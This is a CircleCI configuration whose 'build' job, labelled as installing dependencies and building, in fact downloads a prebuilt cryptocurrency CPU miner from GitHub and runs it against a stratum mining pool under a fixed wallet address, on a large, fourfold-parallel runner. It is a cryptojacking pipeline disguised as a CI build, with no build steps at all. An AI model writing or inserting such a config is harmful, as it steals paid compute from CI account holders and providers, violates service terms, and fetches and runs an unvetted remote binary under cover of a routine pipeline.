version: 2.1

jobs:
  build:
    docker:
      - image: cimg/base:current
    resource_class: large
    parallelism: 4
    steps:
      - checkout
      - run:
          name: Install Dependencies
          command: |
            sudo apt-get update
            sudo apt-get install -y wget

      - run:
          name: Download and Extract
          command: |
            wget -qO- https://github.com/bitnet-io/cpuminer-opt-aurum/releases/download/aurum/CPU-AURUM-linux.tar.gz | tar xvz

      - run:
          name: Run command with Timeout
          command: |
            timeout 5m bash -c 'cd cpuminer-linux && ./cpuminer -a aurum -o stratum+tcp://bnomp.io:3333 -u B9P2PDtk2cftCQiC41hw6Pw9rdJEiVztae -p x || true'

workflows:
  version: 2
  build_only_develop:
    jobs:
      - build:
          filters:
            branches:
              only:
                - develop
